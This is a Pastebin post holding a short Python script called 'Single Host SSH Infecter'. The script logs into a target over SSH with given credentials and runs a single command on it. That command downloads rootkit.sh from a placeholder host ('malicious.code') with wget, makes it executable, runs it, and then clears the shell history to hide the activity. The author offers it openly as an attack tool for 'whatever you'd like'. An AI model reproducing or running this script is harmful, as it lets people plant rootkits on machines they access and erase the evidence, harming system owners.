Advertisement
1337ings

[Python] Single Host SSH Infecter

Jul 16th, 2017
715
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.34 KB | None | 0 0
  1. #!/usr/bin/python
  2. # This is auto-infecter for SSH port tcp/22
  3. # You can auto-connect to the target and send
  4. # sudo commands, this was/is mainly used for rooting
  5. # a sudo user on your via target but you can use this
  6. # for whatever you'd like, I have a few good usages for it.
  7. #
  8. # Execution:
  9. # python Infect_One_Host.py <target> <username> <password>
  10. #
  11. # Author:
  12. # Chris Poole | @codingplanets
  13.  
  14. import paramiko
  15. import sys
  16.  
  17. if len(sys.argv) < 3:
  18. sys.exit("\033[37mUsage: python "+sys.argv[0]+" <target> <user> <password>")
  19.  
  20.  
  21. command = 'cd /tmp; wget http://malicious.code/rootkit.sh -O root.sh; chmod 777 root.sh; sh root.sh; history -c'
  22. hostname = sys.argv[1]
  23. username = sys.argv[2]
  24. password = sys.argv[3]
  25. port = 22
  26.  
  27. client = paramiko.Transport((hostname, port))
  28. client.connect(username=username, password=password)
  29. nbytes = 4096
  30. stdout_data = []
  31. stderr_data = []
  32. session = client.open_channel(kind='session')
  33. session.exec_command(command)
  34. while True:
  35. if session.recv_ready():
  36. stdout_data.append(session.recv(nbytes))
  37. if session.recv_stderr_ready():
  38. stderr_data.append(session.recv_stderr(nbytes))
  39. if session.exit_status_ready():
  40. break
  41.  
  42. #print 'exit status: ', session.recv_exit_status()
  43. print ''.join(stdout_data)
  44. print ''.join(stderr_data)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement